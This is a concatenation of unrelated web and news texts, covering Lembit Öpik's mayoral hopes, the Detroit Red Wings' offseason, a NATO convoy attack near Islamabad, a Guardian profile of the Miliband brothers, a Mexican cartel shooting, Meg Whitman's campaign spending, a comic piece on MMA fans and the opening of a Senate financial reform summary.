The 45 - year - old , who has reinvented himself as a stand - up comedian since leaving Westminster , said he was not " trying to be a member of the awkward squad " , adding : " I just think I could run London well and my libertarian approach could be good for the city . "
He has recently toyed with the notion in his comedy act , telling audiences : " There is one job that seems to suit me – a funny name , little bit odd sometimes , quirky , a chequered background and ex-MP – Mayor of London . "
The capital , he said , had already shown a willingness to be amused by electing the current mayor , Boris Johnson .
" Boris has proved that London likes personality , [ but ] I am leftwing and libertarian . "
Asked whether he would have to give up comedy were he to win , Öpik said : " Boris did n't .
And my comedy is laughter with a purpose .
If you can't do politics with a smile , why should people take you seriously ?
But I 'm at the mercy of London .
If they want me , they can have me . "
Öpik , a chatshow regular known for dating TV presenter Sian Lloyd and one of the Cheeky Girls , was one of the most high - profile Lib Dem election casualties .
He lost his Montgomeryshire seat by just over 1,000 votes on a swing of 13.16 % to the Tories .
On Thursday , the Labour party announced that its two principal contenders to be Labour 's mayoral candidate in 2012 would be the former mayor Ken Livingstone and Oona King .
Earlier this week , the London Evening Standard reported that Johnson had been " toying with the idea " of running for a mayoral second term and is expected to declare his candidacy in the next few weeks .
A spokeswoman for the Liberal Democrats said that the party was aware of Ö pik 's desire to run , but added that no decision had been made on who would stand as the Lib Dem candidate .
Please turn on JavaScript .
Media requires JavaScript to play .
An Abu Dhabi hotel has installed an ATM - style gold dispenser to give customers easy access to the precious metal .
It comes as gold prices have reached record highs in recent days .
Iain Smith reports .
Listing of Links to All States Pick - Your - Own Farms
I have free illustrated directions on making and canning jam , pickles , spaghetti sauce , salsa , ketchup , corn . for you on the website .
And if you are looking for Canners , mixes , jars , pectin and other canning supplies at the best prices anywhere !
The sale of these products is what enables me to keep the site running and up to date .
And I 've also tried to find the best quality , most reliable vendors and best prices for you , too !
In the table above is the free listing of pick - your - own farms in almost every state in the United States and 5 other countries .
If I have n't included your state or country , email me any information you have about pick your own farms and orchards in your state and I 'll add it !
See How to Add a Farm to PickYourOwn.org
DETROIT --
The Detroit Red Wings will part with some players and add a few parts this offseason , but they do n't have the salary cap space or the need to make major moves .
Any changes they make likely will be minimal , especially if Nicklas Lidstrom returns .
That is why improvement must come from within .
They have a lot of players who need to elevate their game and others who should be better by being healthy and rested .
" A message has been sent to myself as a coach and the management that we have to improve our team , '' Red Wings coach Mike Babcock said .
" How do you improve your team ?
" You improve your team by Val Filppula taking a big step .
He 's at that point in his career he 's got to take a step .
You improve by Mule ( Johan Franzen ) being healthy , by ( Jonathan ) Ericsson taking a big step . ''
Two days after being eliminated by the San Jose Sharks in the Western Conference semifinals , the Red Wings cleaned out their lockers Monday following the team photo .
Looking ahead to next season , Babcock expects more from players they already have , not anybody they might acquire .
Filppula , who missed 26 games early in the season with a broken wrist , is a playmaker , not a finisher , but the team thinks he is capable of being a 20 - goal , 70 - point producer .
Dan Cleary missed 18 games with injuries and battled inconsistency after posting consecutive 20 - goal seasons .
Franzen might have topped the 30 - goal mark again if he had n't missed 55 games because of a torn knee ligament .
Stars Pavel Datsyuk and Henrik Zetterberg figure to produce more than 70 points each .
The Red Wings ' biggest addition likely will be Jiri Hudler , who will bolster their offense after spending one year in Russia .
" It 's 70 points we did n't have .
That 's a second power - play unit that can score , '' Babcock said .
" It 's more goals for everyone because of the plays he can make .
We 're going to give him an opportunity to be a top - six forward .
He 's got to show he can be one . ''
The Red Wings need more skill and scoring punch from their third line .
Filppula , Cleary and / or Hudler can help in that area if they 're not playing on one of the top two lines .
The club must decide whether to re-sign Todd Bertuzzi .
Jason Williams is n't expected to return .
On defense , Nicklas Kronwall and Ericsson figure to be better .
Kronwall was n't the same after returning from a knee injury that idled him for two months .
Ericsson struggled during his first full NHL season after showing much promise in the 2009 playoffs .
" ( Ericsson ) has got to come back next year and take a real step , '' Babcock said .
" He 's very capable . ''
Jakub Kindl , their 2005 first - round pick , will compete for the sixth spot on defense , possibly with veteran Andreas Lilja , if he is re-signed .
Brett Lebda is not likely to return .
" There 's a number of things we can do internally , and then we 'll make some changes to help ourselves get better , '' Babcock said .
" In the end , we were n't deep enough . ''
A longer offseason will help players re-energize .
" In our organization , we believe the final four is the measure , '' Babcock said .
" You have to be in it every year .
And when you do n't get there , you 're disappointed .
The gift of it this year is they can take now and until the end of May off and have 15 weeks to train .
You can get your body back . ''
No question that three long playoff runs took their toll .
" I guess that 's the good thing you can take out of losing early , '' Lidstrom said .
" You can recharge for an extra three or four weeks . ''
This team 's success will hinge , to a large extent , on whether Lidstrom , the six - time Norris Trophy winner as the NHL 's top defenseman , returns or retires .
He said he will decide before July 1 , the start of free agency .
Babcock is optimistic .
" I just think he 'll be back .
I 'm not one bit concerned , '' Babcock said .
" He 's got too much good hockey left in him .
I think if he believed we did n't have a chance to win , it might be different .
But I think he 's like the rest of us , he thinks we 'll be right back knocking on the door . ''
Gunmen have attacked a Nato convoy near the Pakistani capital , Islamabad , killing at least seven people and setting several vehicles on fire .
The overnight assault took place 10 km ( six miles ) outside the city - the closest such attack yet to the capital .
Up to a dozen militants opened fire , setting 20 trucks alight and destroying millions of dollars of equipment .
Meanwhile heavy fighting has taken place in the north - west between militants and the army .
' Indiscriminate firing '
The Nato trucks were carrying supplies to alliance troops in Afghanistan .
" The attack took place around 2335 local time ( 1835 GMT ) and we are still trying to find out how this attack has happened , " said Shah Nawaz , the head of the police station in Tarnol , where the trucks were parked at a roadside depot .
" The attackers walked into the depot and started indiscriminate firing , " he told Reuters news agency .
Kalim Iman , inspector general of Islamabad police , said that police were searching for the suspected militants , who escaped in two cars and on motorbikes to a nearby forest area .
The BBC's M Ilyas Khan says that the attack is the most brazen to be carried out by militants in Islamabad , although since September 2008 Nato convoys have been regularly targeted in Balochistan and in the cities of Karachi and Peshawar .
The Taliban have hijacked lorries , stolen their cargo and kidnapped their drivers .
On one occasion in November 2008 , militants captured Humvee armoured cars destined for Afghanistan and filmed themselves triumphantly driving off with their booty of Nato vehicles .
The latest attack is a brutal reminder to Nato commanders in Afghanistan that their lifeline is vulnerable , says the BBC's Orla Guerin in Islamabad .
Different militant groups retain the ability to strike with relative ease , our correspondent adds .
Analysis
The fact that this time the strike was so close to Islamabad and was carried out so audaciously will be a cause of concern to the authorities here .
It will renew anxiety in Afghanistan about trying to find alternative routes .
Militants are being flushed out of one area ( by Pakistani military offensives ) but are surfacing in another .
It is very clear the militants have not been fatally disrupted as the government likes to claim .
We do not yet know if this is the work of the Taliban leader Hakimullah Mehsud or his men , but certainly these convoys are targeted by militants who are angered by the fact that they are travelling so regularly on Pakistani roads .
In addition to those killed police said at least four others were injured .
Most of the casualties were thought to be drivers of trucks or their assistants .
A senior policeman responsible for the area where the attack took place has been suspended for possible dereliction of duty , officials say .
Truckers protesting against the attack briefly closed the grand trunk road linking Lahore , Rawalpindi and Peshawar before being persuaded by police to end their protest .
In Karachi transport associations also protested , demanding better security for their members .
" We are in mourning , " Yusuf Shahwani , president of the All Pakistan Oil Transporters ' Association , told the BBC .
" Not a single tanker has left Karachi today for Afghanistan .
" The government is not serious about the security of the convoys - how can armed men run riot for half an hour in such an area without any response from the security forces ? "
Some three - quarters of the supplies needed by the 130,000 US - led international troops in Afghanistan are transported by land from the Pakistani port of Karachi .
The regular attacks have compelled Nato and American forces to look for other supply routes , principally through Central Asia .
Bombing
This latest attack comes after months of relative calm around Islamabad .
In the latest fighting in the north - west of the country , the Taliban killed at least six soldiers , including an army captain , in an ambush near the town of Ghaljo in Upper Orakzai tribal region , officials say .
They say that about 12 soldiers were injured in the ambush , which took place on Tuesday .
Image caption Militants posed in 2008 alongside stolen Humvee armoured cars
An official told BBC Urdu's Riffat Orakzai that a security force convoy was heading from Dabori to Ghaljo when it was ambushed from both sides along a narrow mountain track .
That led to aerial and artillery attacks on suspected militant hideouts in Upper Orakzai region which went on for several hours , the official said , killing more than 30 militants .
The army 's claims could not be independently verified .
Correspondents say that the attack comes just over a week after the army said its operation in the region had been successfully completed .
While the security forces have conducted widespread searches in Lower Orakzai over the last four months , there had been no action other than aerial bombings in Upper Orakzai .
ok so what if , in some parallel universe , their existed an exact copy of earth , and on this earth was an exact copy of you .
and the dreams we have at night are simply a glimpse into the life of our alter persona on this secondary earth .
would our alter personas dream about us then ?
Famous TB 303 Patterns
Page 1 2 3 4 5
Are you wondering how to create a great 303 pattern ?
Take a look at these ones and get inspired !
Want to lear how to program a tb303 , watch this tuorial .
The following correction was printed in the Guardian 's Corrections and clarifications column , Monday 11 January 2010
In the article below , we referred to David and Ed Miliband as the first brothers to sit in a cabinet together since Austen and Neville Chamberlain in 1931 .
The most recent pair was actually in 1938 – ­( Edward ) Lord Stanley and his brother Oliver Stanley .
At the foot of the North Downs in Kent lies a magnificent 17th - century pile that has enchanted visitors for centuries .
Lord Rosebery was so taken by Chevening House that the former prime minister crossed out its name on the estate 's writing paper and simply wrote " Paradise " when he stayed there in the summer of 1911 .
It was to the gentle surroundings of Chevening , home to the Earls of Stanhope for seven generations from the time of George I until 1959 , that a family of impeccable New Labour credentials escaped over the Christmas break .
David Miliband , who has the run of Chevening as foreign secretary , invited his younger brother and fellow cabinet minister , Ed , to join his family there .
The party also included the brothers ' partners and their three young children and their mother , Marion .
The Milibands are the first brothers to sit in a cabinet together since Austen and Neville Chamberlain in 1931 .
They have achieved the remarkable feat of rising almost to the very top of British politics while remaining genuinely close .
" David and Edward have always been very solicitous of one another 's feelings as well as opinions , " says Leo Panitch , an old friend of their parents .
This Christmas , however , must have had a rather different feel , thanks to the sensitive matter that has been steadily creeping up on the brothers recently – the leadership of the Labour party .
Both brothers have had the same thoughts for months , if not years : that there is likely to be a vacancy after the general election and Miliband Sr , 45 , will be the frontrunner to succeed , or even displace , Gordon Brown .
But as 2009 drew to a close , it became increasingly apparent throughout the Labour party that there is growing support for the foreign secretary 's younger brother , Ed , who turned 40 on Christmas Eve .
His successful performance at the Copenhagen talks – the climate change secretary is credited with saving the negotiations from complete collapse with an impassioned intervention in the early hours of the Saturday morning – coupled with his affable manner is leading senior Labour figures to talk up his chances .
One cabinet colleague sums up the thinking : " I think David is the senior figure .
But it is fluid .
It looks like David now and not Ed .
But you can't be sure .
David only half wants the job , as we have seen .
Ed probably only half wants it .
I 'm not sure which one it will be .
It depends who comes out of the election campaign with stardust . "
Comparisons are being drawn with 1994 when the frontrunner – Gordon Brown – was displaced by his junior - Tony Blair - who was thought to have a more natural appeal to voters .
There is one crucial difference .
Unlike Blair , who had decided that Brown lacked the mettle for the leadership when he declined to run in 1992 , Miliband Jr has not reconciled himself to challenging his older brother and is full of dread at the prospect of a contest .
" It is a nightmare scenario for both of them .
Ed and David will have to sit down and talk about it .
That will be terrible .
It is mortifying , " says one New Labour veteran , who has known the brothers for the best part of two decades .
" It is a bit like two brothers who fall in love with the same woman .
That woman loves both of them .
What should they do ?
Flip a coin ?
Actually , it is horrible .
If it is a woman , it only matters to three people .
But who is leader of the Labour party matters to the country . "
The decision the Milibands make will have a profound impact on the party to which they have devoted their lives .
Will Ed continue to defer to his " more famous brother " ?
Or will he break new ground and put his name forward , either immediately when a vacancy arises or only if David struggles to win support ?
Whatever decision they make , friends believe the depth of their brotherly love means they will not fall out .
" I would be very surprised if there was any bad blood between them , " says Panitch .
The leafy surroundings of Primrose Hill , home to some of the leading lights in London 's intelligensia , providesthe backdrop to the Miliband partnership .
In the white stucco - fronted family house in a side street between Primrose Hill and Camden Town , the two brothers were inspired as they were growing up by some of the grandest figures on the left .
In the 1970s the Marxist intellectual Ralph Miliband and his academic wife Marion Kozak , survivors of the Holocaust , hosted the likes of veteran leftwinger Tony Benn , the head of the ANC 's military wing , Joe Slovo , and Tariq Ali .
" It was just very good fun to go there for meals , " Benn says of the house , now home to David and his family .
" David and Ed were both clear - headed and both of them still are . "
Panitch believes that the Milibands ' involvement in what he calls " practical politics " , despite being the sons of an eminent Marxist theoretician , is down to Ralph 's passionate interest in day - to - day affairs .
" When The World at One came on the BBC at 1 pm the house stopped , " says Panitch , editor of the Socialist Register founded by Ralph .
" Everyone would be downstairs listening to the radio , often with comments being made .
You know : ' Denis Healey could have said that much better than he did , ' or ' Jim Callaghan fluffed that one . '
The boys quickly picked that up .
They developed an ear for what was effective and principled from a remarkably young age . "
As they matured politically the two brothers , who are four and a half years apart in age , formed a strong bond when they followed their father on a series of academic postings , first to Leeds in the early 1970s and then to the US .
" David and Edward were not competitive , they were not trying to one up one another , " Panitch recalls .
" There was a lot of mutuality . "
It was little surprise that the brothers embarked on an identical path .
They attended Haverstock comprehensive school in Camden before both studying politics , philosophy and economics at the same Oxford college , Corpus Christi , under the same tutor .
The late Andrew Glynn , a Marxist friend of their father 's , was a key influence on both men .
The Milibands were studious at Oxford .
David was known as Donny Osmond thanks to his pudding bowl haircut , while Ed was known as Ted in those days .
Friends joke that he dropped the name to fit in when he started working alongside two other Eds ( Balls and Richards ) under Gordon Brown .
Neither Miliband shone on the wider Oxford stage .
Their highest electoral office was as president of their college Junior Common Room ( JCR ) , a post they won as active members of the Labour club .
Ed 's greatest revolutionary act was to lead a rent strike .
Their parents were deeply proud of their sons ' achievements .
But Benn says : " I think Ralph [ who died in 1994 ] would have been a bit disappointed in the way it has developed .
Very proud but also a bit disappointed . "
Panitch says : " Given that Ralph wrote the book on the limits of parliamentary socialism it is surprising his sons ended up as Labour party politicians , at least in the age of the third way . "
It was after Oxford – Ed graduated in 1992 with a 2:1 , five years after his brother had secured a first – that their paths began to diverge .
In 1994 David went to work for Tony Blair as his head of policy , a position he kept in Downing Street .
In the same year , Ed went to work for Gordon Brown as a speechwriter and economic adviser .
The brothers now found themselves on either side of what would become the biggest divide in British politics for the next decade .
But still they were close and would talk constantly , even though they moved in different social circles .
It helped that , by now , they were living under the same roof , though in separate flats .
Ed had the top flat in a house in Chalcott Square , close to their family home in Primrose Hill , while David lived downstairs .
" They were in and out of each other 's flats , " one friend says .
The Milibands were never caught up in the full Blair / Brown wars because they both escaped before blood was spilled : David left No 10 in 2001 to become an MP , while Ed took a sabbatical to Harvard soon afterwards to lecture on government , just as Brown declared open war on Blair over public service reform .
It also helped that Ed was going out with Liz Lloyd , a member of the No 10 policy unit , and he occupied the unofficial post of Brownite ambassador to No 10 .
" Ed always tried to be very nice , " one member of the Blair team recalls .
" He was the reverse of hectoring . "
Their professional paths met again in the House of Commons in 2005 when Ed was elected as MP for Doncaster North .
His older brother had been elected four years earlier in South Shields .
By the summer of 2007 they were both members of Brown 's first cabinet .
But it is their time on either side of the Blair / Brown divide that is returning to haunt the brothers as the party looks to a future beyond the two giants of New Labour .
To the admirers of Blair , the foreign secretary is seen as the true keeper of the New Labour flame .
To large swaths of the Labour movement , and most particularly to the unions , anyone associated too closely with Blair is beyond the pale .
It is against this background that one key figure , who was instrumental in securing the Labour leadership for Blair in 1994 , is likely to find himself playing the role of kingmaker again .
One of the more comic turns at this year 's Labour party conference , which cheered up the delegates as they faced near certain electoral defeat , was the speech by Lord Mandelson .
In a performance worthy of a vaudeville act , the first secretary of state and lord president of the council , to list just two of his numerous titles , finally won over his beloved Labour party when he declared : " If I can come back we can come back . "
This cemented Mandelson 's place as a kingmaker in the Labour leadership contest as he was cheered to the rafters by the three sections of the electoral college : MPs and MEPs , the unions and constituency Labour parties .
Mandelson is a great admirer of both brothers .
He believes the foreign secretary has grown into his job and would be a strong candidate for the leadership .
He sees the younger Miliband as a precious asset who may need to be kept safe for the future .
Scarred by his experience in 1994 , Mandelson is keeping his counsel .
But he will be aware where the weight of opinion lies around the cabinet table : the foreign secretary is the natural frontrunner , who enjoys the private support of Blair , but his younger brother is closing in fast .
One cabinet minister says : " It must be the case that David is ahead .
He is the foreign secretary , he is older .
But you can't tell in politics .
If there were to be a vacancy David would be the obvious person .
In a year 's time or so who knows ?
It depends where the party is . "
With support growing for Miliband Jr , supporters of his older brother are embarking on some discreet lobbying .
As the frontrunner , Miliband Sr has everything to lose unless he builds up strong momentum .
His friends are sending out three key messages : he will definitely run ; he does have guts and decided against running in the past for sensible reasons ; and he is not , after all , a true Blair devotee .
One friend says : " It is absolutely clear that David is going to stand .
There is no doubt . "
Knowing that some see him as a bit of an outsider , with a slight tendency to be a grand intellectual , the friends point out that he showed his devotion to the Labour party by spurning a guaranteed future on the diplomatic circuit as the EU 's high representative for foreign policy .
" David sacrificed being Henry Kissinger for 10 years to stay and fight for the party , " according to one friend .
Europe gave Miliband
Sr the chance last autumn to restore his place as the frontrunner to succeed Brown – he had faltered after the prime minister mocked him as a " novice " at party conference in 2008 – when he launched a passionate attack on the Tories for teaming up in the European parliament with a Latvian party , some of whose members commemorate the Latvian Waffen SS .
" It makes me sick , " Miliband Sr told the Labour conference .
While Miliband
Sr was praised widely for his speech , friends know they have their work cut out to persuade the Labour party that he is made of steel after missing three chances to stand for the leadership .
He rejected Mandelson 's advice to challenge Brown when Blair stood down in 2007 ; fluffed his chance again in the summer of 2008 at one of Brown 's low points , and was famously pictured looking absurd holding a banana at the Labour conference a few months later .
Finally , he failed to deliver what would have been a fatal blow to Brown when he declined to follow his great friend , James Purnell , after he resigned from the cabinet in June .
One friend says : " The narrative is David bottled it three times .
That is fundamentally wrong .
He has a steely determination to be leader of the Labour party .
On each occasion he did not go for it because it would not work . "
If Miliband Sr persuades the party that he is not a bottler , he still has to dismiss the perception that he is a stooge of Blair who is privately backing him for the leadership .
This explains why union barons – led by the Unite joint general secretary Derek Simpson , who is bankrolling Labour 's general election campaign – are beginning to voice support for his younger brother .
Benn , who employed the younger Miliband to work on his diaries after his O - levels , reflects this view .
" It is a fact that David was very very close to Blair in the No 10 outfit at a time when Blairism was at its height .
Ed had a different life .
People tend to look at somebody 's record .
I dare say it would have an effect . "
Arch Blairites believe Miliband
Sr has a credible defence here : they never saw him as a true believer and were relieved when he was ousted by Blair as head of his policy unit in the run-up to the 2001 general election to make way for one of their own , Andrew Adonis , now the transport secretary .
" David was never dewy - eyed about Tony , " one of his closest friends says of Miliband Sr , who once dismissed Blair 's Third Way as " wanky " .
Another figure from that era recalls how bruised Miliband was when Blair announced that his time would come to an end and that David should stand as an MP in 2001 .
Miliband was upset when Adonis replaced him , even though Blair made clear that he was cabinet material .
The former No 10 figure explains why Blair , while retaining affection and admiration for the man known by Alastair Campbell as " Brains " after the Thunderbirds puppet , did not believe he was sufficiently zealous to lead public service reforms in Labour 's second term .
" Tony always thought that David was 80 % Blairite and Andrew was 120 % Blairite .
At that time he preferred a 120 % Blairite who would push him to be a reformer further than the politics would allow , rather than someone who would warn him about about how far he could go . "
Meanwhile Miliband
Jr is keeping quiet .
" Ed is now conscious that people are talking about him as a potential leader , " says one New Labour veteran .
" It is a situation he wishes was not there , because that means that he has become a rival to his brother .
If David had not been born and you looked at the Labour party and said who would be leader , there is no doubt that Ed would be on a list of the top three .
The problem is that David was born and was born before Ed . "
Miliband
Jr has four strengths , goes the thinking .
He is a more natural media performer than his brother , as his assured appearances at Copenhagen showed ; he connects more easily with the party , which he has been courting assiduously as co-ordinator of Labour 's general election manifesto ; and he would find it easier to unite the party , whose left and right wings are warming to him .
As a 40 - year - old , who has only been an MP for five years , he represents more of a break with the Blair / Brown era .
There is another factor that is being whispered : he may have worked for Brown , but Miliband Jr has not been afraid to stand up to his master .
A year ago he irritated the prime minister by wringing out environmental concessions before signing up to the third runway at Heathrow .
" Heathrow was Ed's coming of age , " one member of the cabinet says .
" Ed , who made life quite difficult for Gordon , had a big influence on the decision .
But he is collegiate and he has stuck by it . "
This stand answered the charge , friends say , that he is indecisive .
It also saw him line up against the most powerful Brown courtier , the schools secretary , Ed Balls , who takes a pro-business line on Heathrow .
Miliband Jr will be treating Balls with caution .
Balls , another serious contender for the Labour leadership who can barely stand the sight of Miliband Sr , may well be keen to see the younger brother assume a higher profile as a way of undermining his own arch - rival .
Another cabinet minister , who watched the Heathrow showdown , is blunt about the choice .
" It has to be Ed [ Miliband ] .
He is the future . "
Another influential fan says : " If we lose [ the election ] , Labour deserves to have the best possible leader .
You have to ask who has the most potential to connect with voters and to articulate their values .
David is a nice guy .
But Ed is better . "
It takes an outsider to spell out their strengths and weaknesses .
Professor Sir David King , the government 's former chief scientist , became a huge fan of Miliband Sr when they worked closely on climate change at the old environment department .
But the younger Miliband , who meets King these days on climate change , is catching his eye .
" Most of us have become increasingly impressed with Ed. David appears to be a little bit gauche , a little bit strange in the public eye , prone to suck the end of his tie in public , which would embarrass his wife , or put his feet up on a table in front of a big audience .
This is because his mind becomes totally engaged with the problem and he sort of forgets what his hands and legs are doing .
But there is something absolutely charming about that .
That is something that can be built on as a political asset .
Ed is more the quiet guy that gets on with it .
The intellect is similarly very good .
I think Ed is inclined to be more modest and is as good as David at taking on advice .
He is a very good listener .
Both of them have that attribute . "
As the Milibands return to Westminster this week , refreshed from their break in the Kent countryside , they know that they face a heavy decision .
The senior Miliband remains in front for the moment .
But after the election that could all change .
" It is possible that Ed wants David to be leader , " says one senior figure who knows them well .
" But there may come a point when it becomes apparent that David does not have enough support .
There may be enormous pressure for Ed to stand and enormous pressure for David to stand aside .
It is all about how it feels after the election . "
The Milibands ' mother , Marion , will look on with concern over the coming months , though her advice may be limited .
" Do you know about my mother 's politics , " the older Miliband says with great affection of his socialist mother .
" Ed and I have sold out . "
We ’re finding hope in a new bill released by the U.S. House Transportation and Infrastructure Committee that would significantly increase federal funding for bikes .
Safe .
If there is one word to describe SheRecovery that 's what I 'd use .
I thought I was alone , and that I was the weird and the only girl who watched porn .
SheRecovery wiped that notion so quickly .
I was n't the only one struggling with this ?
I was n't strange ?
I was n't abnormal ?
I was relieved to know that I had people with a like - mind wanting to say no to this sin !
SheRecovery has been core in my recovery journey .
It allowed me to completely expose who I was without the fear of rejection .
I am constantly encouraged by the testimony of women who have broken free and sometimes when I felt all hope was lost — I could ask for prayer and know that I was being prayed for .
SheRecovery really is a blessing .
And I thank God for it !
( CNN ) --
Chilling video captured by a security camera shows more than a dozen armed men carrying out a shooting spree in broad daylight that left eight people dead last month in Mexico 's Chihuahua state .
In the video obtained by CNN on Saturday , the men -- believed to be hit men for a drug cartel -- are seen opening fire with assault rifles into nearby vehicles and a housing complex .
A 14 - year - old girl was among the eight victims of the March 15 killings in the town of Creel , according to Carlos Gonzalez , a spokesman for the state attorney general 's office .
" We do n't know what group these hit men are part of , but here in Chihuahua there are two warring groups : the Sinaloa Cartel and Juarez Cartel , " Gonzalez said .
" We 're working on trying to figure out which group was responsible . "
Gonzalez said there is no evidence to suggest that the victims were involved in drug activity , adding that the motive for the shootings is unclear .
He said the video -- captured by a state public security camera -- is " important " evidence in the investigation .
" This is evidence to identify these people and it's part of the ongoing investigation to find them , " said Gonzalez , who is the lead investigator in the case .
In the video , gunmen are shown approaching the passenger side of a vehicle to receive what appears to be an order for the killings .
A man holding a large gun in the passenger seat also is seen taking a white substance and putting it in his nose several times .
Another portion of the video shows two gunmen intercepting a car and sequestering the driver .
Later in the video , the men shoot two people in an SUV .
In some of the most shocking footage , armed men are seen running across a field before reaching the doors of a housing complex and opening fire into the doors and windows of the residence .
The shootings happened over a period of an hour early on March 15 , Gonzalez said .
" There are very few authorities in this area to police this kind of activity , " Gonzalez said .
The images of the gunmen operating freely in the mountainous northwest part of Chihuahua highlight just how lawless rural parts of Mexico have become as the country works to combat an increasingly violent drug war .
In January , in a case of mistaken identity , 15 people , mostly teenagers , were killed when gunmen attacked a house party in Ciudad Juarez , Mexico .
And late last month , 10 children , youths and young adults between the ages of 8 and 21 were gunned down , presumably by drug traffickers , in the northern Mexican state of Durango .
The question ’s obvious :
Who ’s taking over the creative reins on POWER GIRL ?
Well , let 's read the tea leaves a bit , shall we ?
As some of you recall , Power Girl was once a member of Justice League Europe .
It seems like a lot of the characters that were under the umbrella of Justice League International are reforming in the pages of JUSTICE LEAGUE : GENERATION LOST .
JL : GENERATION LOST is written by Judd Winick .
Well , so 's POWER GIRL , starting with June 's issue # 13 .
Teaming with new artist Sami Basri , who contributed some fantastic covers to recent issues of THE SHIELD and is also handling interiors on POWER GIRL , the latest chapter in Power Girl 's life finds her inching closer to her former JLI teammates -- but why ?
It 's too early to say , gang , but Judd 's got a few teases to keep us on our toes .
Right , Judd ?
" It is with GREAT fear and excitement that Sami and I leap into this gig .
Jimmy Palmiotti , Justin Gray , and Amanda Conner have bought an amazing , fresh , and inventive rebirth to this character .
Our greatest challenge will be to remain faithful to what they 've created and also take Power Girl to a new place .
As far as the course that the story will take , I 'll be uncharacteristically forthcoming :
The story is tied to JUSTICE LEAGUE : GENERATION LOST .
Not CHAINED to it , but tied .
Power Girl has a history with the JLI that will be explored .
A lot . "
Want more ?
Well , here 's Basri 's first cover on the series .
Nice , huh ?
e Bay billionaire Meg Whitman , who last week sailed to victory in the GOP primary for governor , has written her campaign another big check , this one for $ 20 million .
The contribution , reported Monday on the California secretary of state ’s website , brings her total self - contributions to $ 91 million , $ 17 million short of the record amount a wealthy candidate has put into his or her own campaign .
That record was set last year by New York Mayor Michael Bloomberg , a multibillionaire businessman , in his successful re-election bid .
Bloomberg spent about $ 185 per vote .
In last week ’s win over state Insurance Commissioner Steve Poizner , Whitman spent about $ 56 per vote out of her own pocket .
Whitman , who will face state Attorney General Jerry Brown in November , has vowed to write checks for up to $ 150 million in her quest to become governor .
That means she ’ll likely surpass Bloomberg ’s record sometime during the summer .
Contact Ken McLaughlin at 408-920-5552 .
When you have a sport like Mixed Martial Arts that revolves around the concept of trying to render your opponent unconscious or attempt to snap of their limbs it ’s perhaps not surprising that some of the fans are a little …“ unusual ” .
There ’s no better example of this than the now infamous ‘ Just Bleed Guy ’ who came into our lives all the way back at UFC 15 in 1997 .
In this instant classic moment the man who set the benchmark for future fans to live up to gurns intensely at the camera with an expression that sits somewhere between sheer blood - lust and a severe case of the sh*ts .
—
Over a decade later at the historic UFC 100 event in the summer of 2009 , UFC fighter Tom Lawlor paid tribute to Just Bleed Guy by doing an uncanny impersonation of him during the pre-fight weigh - ins that had old - school fans in stitches , and new fans wondering whether Lawlor was having some sort of mental breakdown …
—
The more nostalgic amongst you might wonder what ever happened to the original just bleed guy ?
In an ideal world he’d be the guest of honor at all future events , sitting in - between octagon girls Arianny and Chandella .
—
Unfortunately the last anybody heard he was serving eight years in a Mississippi prison for receiving stolen farm equipment , so in reality he probably now watches UFC events sat in - between these two …
—
He ’s not the only MMA fan that ’s guilty of stealing though .
In fact as you ’ll see in the video below even the fighters are n’t safe from the clutches of the infamous UFC hat thiefs .
—
I feel particularly bad for Randy there as he had his hat and his towel taken from him .
Rumor has it that by the time he got to the cage he was stripped naked and going by the nickname Randy ‘ Au Naturel ’ Couture .
The reality is that there ’s nothing fighters can do about this though .
Even their security detail are no match for a baying mob of MMA fans .
Watch here as one of GSP ’s bodyguards engages in an epic life - or - death struggle for survival against a drunken sea of humanity .
—
God help you if you do n’t have security around you to use as cannon fodder while you make your way back out of the arena though …
—
And of course there is also the threat of a full scale riot at any moment .
The clip below is actually a kickboxing
Vs muay thai bout from many years ago , but it ’s worth noting that the guy getting into a fight around the 3 minute mark and then disappearing under a deluge of arena chairs is none other than MMA referee / judge Cecil Peoples .
Conspiracy theorists suggest that this in actual fact MMA fans from the future that traveled back in time to wreak their revenge on Peoples for awarding Machida the decision against Shogun at UFC 104 .
—
Some fans are lovers , not fighters though – and that ’s an even scarier prospect .
For example , take a look at this tranny geezer ( actually it ’s apparently a singer called Mickey Avalon , but for the purposes of this article I ’m sticking with ‘ tranny geezer ’ ) planting what turned out to be the kiss of death on BJ Penn as he makes his way to the octagon .
—
It ’s surely no coincidence that Penn went on to put on the worst performance of his career .
According to his friends and family the white haired security guard in the clip developed a thousand yard stare and was also never the same after this harrowing incident .
—
Meanwhile an entire audience were left mentally scarred after MMA ’s first male streaker climbed into the cage at a Cage Warriors event while two half naked sweaty men wrestled in the background .
Beware : what ’s been seen ca n’t be unseen – Man Ass Ahead !
—
Not all MMA fans are as creepy as the guys above , some are just all - out goofballs .
Check out the guy below for instance who appears to be either be in a titanic battle with the invisible man , in the midst of a heated high school dance - off , or in the process of having a drug induced seizure .
Judge for yourself …
—
Perhaps he just went to the Chuck Liddell School Of Spectating …
—
With Just Bleed
Guy out of the picture for the forseeable future what MMA needs is someone else to step up to the plate and carry on his good work .
Personally I have high hopes for this young man , known simply as ‘ Brock Lesnar ’s No.1 Fan ’ , who cropped up at UFC 91 displaying the kind of raw intensity that makes me think he may well be the rightful heir to the Just Bleed throne .
—
On completely the other end of the spectrum there ’s also ‘ Moosin Guy ’ , who made grown men cower in fear after appearing in the crowd at the Moosin : Tim Sylvia Vs Mariusz Pudzianowski fight looking like a poster child for cannibalistic serial killers .
Warning : this man will burn a hole in your soul and haunt your dreams – proceed with caution … .
—
Finally there ’s the man dubbed ‘ Epic Chest Hair Guy ’ , who attempted to reinvent the classic pose by shaving “ UFC ” into his chest and ditching the constipated expression for one that appeared to fall somewhere between Robert DeNiro in ‘ Taxi Driver ’ and a mentally challenged extra from ‘ One Flew Over The Cuckoo ’s Nest ’ .
—
it turned out this guy was a member of the UG forum , becoming an instant hero and having this equally epic video made in his honor , and an obligatory photoshop …
—
Crazy MMA fans , we salute you !
—
Article By RossC for FightOfTheNight .Com
If you enjoyed this article then why not check out some of our other recent light - hearted MMA features :
This is about the fifth version of this comic I ’ve done .
I almost gave up but I think it turned out OK .
I had the idea nailed I just could n’t bring it into being – as it were .
The Senate passed its financial reform bill .
Huzzah !
What did the Senate wind up with after three weeks of such intense lobbying and debate ?
First , I ’ll run through the big , headline - grabbing changes .
Then the real fun begins : the changes that are coming which you probably have n’t been hearing as much about .
Just remember that Congress still has to mesh together the Senate bill with what the House passed in December .
This is n’t necessarily the final say .
First , the familiar .
The bill :
Creates a Financial Stability Oversight Council , led by the Treasury Secretary , to identify systemic risks in the economy , with the authority to write rules about how much leverage big financial firms are allowed to have
